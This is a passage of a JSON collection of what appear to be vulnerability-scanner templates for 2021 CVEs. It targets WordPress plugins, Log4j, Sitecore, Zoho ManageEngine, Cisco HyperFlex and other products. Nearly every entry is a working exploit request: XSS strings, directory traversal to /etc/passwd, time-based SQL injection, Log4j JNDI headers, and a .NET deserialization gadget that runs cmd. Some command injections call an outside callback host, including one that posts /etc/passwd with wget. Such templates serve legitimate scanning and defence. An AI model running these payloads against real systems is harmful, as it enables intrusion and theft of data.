Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43496","info":{"name":"Clustering Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img/../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42237","info":{"name":"Sitecore Experience Platform Pre-Auth RCE","severity":"critical"},"requests":[{"raw":["POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" ?>\n<a>\n    <query></query>\n    <source>foo</source>\n    <parameters>\n        <parameter name=\"\">\n            <ArrayOfstring z:Id=\"1\" z:Type=\"System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\n                xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\"\n                xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\"\n                xmlns:x=\"http://www.w3.org/2001/XMLSchema\"\n                xmlns:z=\"http://schemas.microsoft.com/2003/10/Serialization/\">\n                <Count z:Id=\"2\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Count>\n                <Comparer z:Id=\"3\" z:Type=\"System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\" z:Assembly=\"0\"\n                    xmlns=\"\">\n                    <_comparison z:Id=\"4\" z:FactoryType=\"a:DelegateSerializationHolder\" z:Type=\"System.DelegateSerializationHolder\" z:Assembly=\"0\"\n                        xmlns=\"http://schemas.datacontract.org/2004/07/System.Collections.Generic\"\n                        xmlns:a=\"http://schemas.datacontract.org/2004/07/System\">\n                        <Delegate z:Id=\"5\" z:Type=\"System.DelegateSerializationHolder+DelegateEntry\" z:Assembly=\"0\"\n                            xmlns=\"\">\n                            <a:assembly z:Id=\"6\">mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:assembly>\n                            <a:delegateEntry z:Id=\"7\">\n                                <a:assembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:delegateEntry i:nil=\"true\"/>\n                                <a:methodName z:Id=\"8\">Compare</a:methodName>\n                                <a:target i:nil=\"true\"/>\n                                <a:targetTypeAssembly z:Ref=\"6\" i:nil=\"true\"/>\n                                <a:targetTypeName z:Id=\"9\">System.String</a:targetTypeName>\n                                <a:type z:Id=\"10\">System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                            </a:delegateEntry>\n                            <a:methodName z:Id=\"11\">Start</a:methodName>\n                            <a:target i:nil=\"true\"/>\n                            <a:targetTypeAssembly z:Id=\"12\">System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</a:targetTypeAssembly>\n                            <a:targetTypeName z:Id=\"13\">System.Diagnostics.Process</a:targetTypeName>\n                            <a:type z:Id=\"14\">System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]</a:type>\n                        </Delegate>\n                        <method0 z:Id=\"15\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"11\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"12\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"13\" i:nil=\"true\"/>\n                            <Signature z:Id=\"16\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"17\" z:Type=\"System.String\" z:Assembly=\"0\">System.Diagnostics.Process Start(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"18\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method0>\n                        <method1 z:Id=\"19\" z:FactoryType=\"b:MemberInfoSerializationHolder\" z:Type=\"System.Reflection.MemberInfoSerializationHolder\" z:Assembly=\"0\"\n                            xmlns=\"\"\n                            xmlns:b=\"http://schemas.datacontract.org/2004/07/System.Reflection\">\n                            <Name z:Ref=\"8\" i:nil=\"true\"/>\n                            <AssemblyName z:Ref=\"6\" i:nil=\"true\"/>\n                            <ClassName z:Ref=\"9\" i:nil=\"true\"/>\n                            <Signature z:Id=\"20\" z:Type=\"System.String\" z:Assembly=\"0\">Int32 Compare(System.String, System.String)</Signature>\n                            <Signature2 z:Id=\"21\" z:Type=\"System.String\" z:Assembly=\"0\">System.Int32 Compare(System.String, System.String)</Signature2>\n                            <MemberType z:Id=\"22\" z:Type=\"System.Int32\" z:Assembly=\"0\">8</MemberType>\n                            <GenericArguments i:nil=\"true\"/>\n                        </method1>\n                    </_comparison>\n                </Comparer>\n                <Version z:Id=\"23\" z:Type=\"System.Int32\" z:Assembly=\"0\"\n                    xmlns=\"\">2</Version>\n                <Items z:Id=\"24\" z:Type=\"System.String[]\" z:Assembly=\"0\" z:Size=\"2\"\n                    xmlns=\"\">\n                    <string z:Id=\"25\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">/c nslookup {{interactsh-url}}</string>\n                    <string z:Id=\"26\"\n                        xmlns=\"http://schemas.microsoft.com/2003/10/Serialization/Arrays\">cmd</string>\n                </Items>\n            </ArrayOfstring>\n        </parameter>\n    </parameters>\n</a>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["System.ArgumentNullException"]}]}]},{"id":"CVE-2021-24275","info":{"name":"Popup by Supsystic <1.10.5 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25118","info":{"name":"Yoast SEO 16.7-17.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"path\":\"(.*)/wp-content\\\\(.*)\",\"size"],"part":"body"}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24407","info":{"name":"WordPress Jannah Theme <5.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/jannah/assets/","attachment-jannah-image-"],"condition":"or"}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\n\naction=tie_ajax_search&query[]=</script><script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45046","info":{"name":"Apache Log4j2 - Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\nAccept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://127.0.0.1#.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-46419","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n\n{{randstr}}\n","DELETE /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nDNT: 1\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201 && status_code_2 == 204","contains(server_1, \"lighttpd\")"],"condition":"and"}]}]},{"id":"CVE-2021-44077","info":{"name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/RestAPI/ImportTechnicians"],"matchers-condition":"and","matchers":[{"type":"word","words":["<form name=\"ImportTechnicians\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24943","info":{"name":"Registrations for the Events Calendar < 2.7.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nevent_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(body, \"Please enter the email you registered with\")"],"condition":"and"}]}]},{"id":"CVE-2021-24286","info":{"name":"WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"alert%28document.domain%29\") && contains(body_2, \"Moove redirect 404\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-27561","info":{"name":"YeaLink DM 3.6.0.20 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid","gid","groups"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27319","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname={{randstr}}&email={{randstr}}%40test.com'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-25075","info":{"name":"WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\naction=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n","GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["style=animation-name:rotation onanimationstart=alert(/XSS/) p","toplevel_page_wpda_duplicate_post_menu"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46381","info":{"name":"D-Link DAP-1620 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/apply.cgi"],"body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Stop Spammers Spam Prevention","Tags:"],"condition":"and"}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-41569","info":{"name":"SAS/Internet 9.4 1520 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/themes/car-repair-services/css","/wp-content/themes/car-repair-services/js","id=\"car-repair-services-"],"condition":"or"}]},{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-22122","info":{"name":"FortiWeb - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error3?msg=30&data=';alert('document.domain');//","{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('document.domain');//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["alert('document.domain')","No policy has been chosen."],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site 